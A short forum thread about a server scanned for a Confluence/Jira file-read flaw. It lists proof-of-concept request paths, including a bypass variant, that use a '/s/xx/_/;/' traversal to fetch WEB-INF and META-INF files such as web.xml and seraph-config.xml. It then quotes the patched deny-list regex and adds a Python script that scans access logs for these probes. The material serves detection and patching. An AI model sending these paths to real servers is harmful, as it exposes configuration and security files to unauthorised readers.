Server probed by scans for the Confluence file read vulnerability
Network Security
35 views | 1 reply | 2024-03-25
- /s/33e27393e2431313e2838313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
Today I noticed requests for an unknown URL; one look and it is obviously a penetration attempt.
大神
Posted on 2024-3-25 11:25:31
Confluence systems all have this vulnerability. The PoC paths are as follows:
- /s/xx/_/;/WEB-INF/web.xml
- /s/xx/_/;/WEB-INF/decorators.xml
- /s/xx/_/;/WEB-INF/classes/seraph-config.xml
- /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
- /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- /s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- /s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
- Slightly modified: /s/everything/_/;anythingulike/WEB-INF/web.xml

Vulnerability fix
The regular expression was modified.
- Pattern PATHS_DENIED = Pattern.compile("[^a-zA-Z0-9]((?i)(WEB-INF)|(META-INF))[^a-zA-Z0-9]")
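
For checking an access log for this kind of probe, the following is an added example and not part of the forum posts or of Atlassian's code. It applies a Python form of the `PATHS_DENIED` pattern quoted above to request paths; the combined log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Python form of the PATHS_DENIED pattern quoted in the reply. Python rejects an
# inline (?i) in mid-pattern, so a scoped (?i:...) group is used instead.
# Assumption: both alternatives are meant to be case-insensitive.
PATHS_DENIED = re.compile(r"[^a-zA-Z0-9](?i:WEB-INF|META-INF)[^a-zA-Z0-9]")

# Assumed layout: combined log format, request line in the first quoted field.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_denied_path(target: str) -> bool:
    """True if the request path names WEB-INF or META-INF as a path component."""
    path = unquote(target.split("?", 1)[0])  # drop query string, decode to one form
    return PATHS_DENIED.search(path) is not None

def find_probes(lines):
    """Return (client_ip, request_target, http_status) for every matching request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_denied_path(m["target"]):
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real log.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Mar/2024:10:58:02 +0800] "GET /s/33e27393e2431313e2838313'
    '/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1"'
    ' 404 196 "-" "-"',
    '203.0.113.7 - - [25/Mar/2024:10:58:03 +0800] "GET /s/xx/_/;/WEB-INF/web.xml'
    ' HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.20 - - [25/Mar/2024:10:59:10 +0800] "GET /s/xx/_/images/logo.png'
    ' HTTP/1.1" 200 900 "-" "-"',
    '198.51.100.20 - - [25/Mar/2024:10:59:11 +0800] "GET /dashboard.action'
    ' HTTP/1.1" 200 3011 "-" "-"',
]

if __name__ == "__main__":
    for ip, target, status in find_probes(SAMPLE_LOG):
        # A 200 on one of these paths needs follow-up; a 404 is a blocked attempt.
        print(f"{ip}  {status}  {target}")
```

The status code is returned with each hit so that requests the server answered with 200 can be separated from those it rejected.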